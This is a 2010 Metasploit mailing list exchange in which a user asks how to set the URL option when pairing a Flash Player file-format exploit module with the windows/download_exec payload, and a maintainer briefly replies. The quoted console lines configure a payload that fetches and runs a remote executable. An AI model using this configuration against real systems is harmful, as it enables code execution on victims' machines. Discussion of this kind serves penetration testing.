Metasploit mailing list archives

Re: How to save exploit+payload to file?

From: egypt () metasploit com
Date: Thu, 17 Jun 2010 11:33:03 -0600

First, keep your questions on-list please.  Second, what?  You can set
options just like any other exploit.

egypt

On Thu, Jun 17, 2010 at 10:54 AM,  <polychrom () fastmail fm> wrote:
exploit/windows/fileformat/adobe_flashplayer_newfunction   --> this
works, thank you!

One note: after we selected PAYLOAD, then we need to set the URL
parameter,
... ...
PAYLOAD => windows/download_exec
msf > exploit(adobe_flashplayer_newfunction) > set URL
http://domain.com/test.exe => I can specify URL parameter in this row
only.
Is this correct?

Thanks.